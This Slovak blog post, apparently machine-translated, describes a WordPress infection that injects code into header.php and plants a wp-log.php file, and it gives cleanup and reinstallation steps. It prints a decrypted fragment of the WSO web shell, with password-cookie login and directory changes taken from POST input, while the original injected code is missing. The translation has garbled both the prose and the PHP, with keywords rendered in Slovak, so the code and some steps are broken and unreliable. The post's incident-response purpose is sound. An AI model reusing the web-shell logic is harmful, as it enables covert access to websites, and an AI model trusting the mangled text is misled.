Pred pár dňami som si všimol zariadenia Kód podozrivý (vírus / malware) v zdroji bežiaceho blogu WordPress. Nasledujúci PHP kód bol prítomný v header.php, pred riadkom .
[Php][/ Php]Neviem presne, ako tento vírus sa nazýva a Nimco dokonca robí presne, ale je to neviditeľná webe postihnutým návštevníkom. Na druhej strane, spôsobí obrovské nižšie stupne vo vyhľadávačoch (najmä Google) a následne pokles v počte návštevníkov webových stránok postihnutým.
Podrobnosti známe o tomto vírusu súborov:
1. Vyššie uvedený kód prítomný v header.php
2. Vznik súboru wp-log.php v priečinku wp-obsahuje.
3. wp-log.php obsahovať nasledujúci kód, šifrované:
[Php][/ Php]Dešifrovací kód v wp-log.php:
[Php]“);
}
funkcia WSOsetcookie ($ k, $ v) {
$ _COOKIE [$ k] = $ v;
setcookie ($ k, $ v);
}
if (! prázdne ($ auth_pass)) {
if (isset ($ _ POST ['pass']) && (md5 ($ _ POST ['pass']) == $ auth_pass))
WSOsetcookie (md5 ($ _ SERVER ['HTTP_HOST']), $ auth_pass);
if (! isset ($ _ COOKIE [md5 ($ _ SERVER ['HTTP_HOST'])])) || ($ _COOKIE [md5 ($ _ SERVER ['HTTP_HOST'])]! = $ auth_pass))
wsoLogin ();
}
if (strtolower (substr (PHP_OS, 0,3)) == „vyhrať“)
$ os = 'vyhrať';
inak
$ os = 'nix';
$ safe_mode = @ini_get ('safe_mode');
if (! $ safe_mode)
error_reporting (0);
$ disable_functions = @ini_get ('disable_functions');
$ home_cwd = @getcwd ();
if (isset ($ _ POST ['c']))
@chdir ($ _ POST ['c']);
$ cwd = @getcwd ();
if ($ os == 'vyhrať') {
$ home_cwd = str_replace („\\“, „/“, $ home_cwd);
$ cwd = str_replace („\\“, „/“, $ cwd);
}
if ($ cwd [strlen ($ cwd) -1]! = '/')
$ cwd. = '/';
?>
[/ Php]
4. Ak je stránka prístupná priamo numeblog.com/wp-includes/wp-log.php objaví sa stránka s poľom prihlásenie. Na prvý pohľad sa zdá, že je to file manažér.
WORDPRESS DEVIRUSING.
1. Najprv vymažte kód z header.php a súbor wp-log.php z wp-obsahuje.
2. Skontrolujte súbor .htaccess podozrivých smerníc. Riadky povolení alebo vykonávanie skriptu.
3. Skontrolujte priečinok témy (/ wp-content /témy/ Nume_tema). Vyhľadajte nové a existujúce súbory (najmä súbory .php), ktoré prešli podozrivými zmenami.
4. Skontrolujte priečinok zapojiťCE (wp-content/plugins).
5. Skontrolujte wp-content podozrivých súborov.
6. Skontrolujte oprávnenie na zápis a súbory. chmod si chown.
NÁVRHY NA SLOVENSKÝ DEVIRUS.
1. V prvom prípade je dobré urobiť zálohu všetkých súborov blogu a databázy.
2. Odstráňte priečinky wp-admin si wp-obsahuje a všetky súbory . Php z koreňa stránky. Ak máte vlastné súbory .php, je dobré ich skontrolovať ručne.
3. Stiahnite si aktuálnu verziu WordPressu a nahrajte ju.
4. Skontrolujte v databáze, či nebol vytvorený užívateľ s hodnotením administrátora.
To je asi tak všetko, čo musíme k tomuto vírusu povedať, ale ak máte doplnky alebo ak zistíme nové podrobnosti, radi tento článok aktualizujeme.
STEALTH SETTINGS - ODSTRÁNIŤ WORDPRESS VÍRUS .
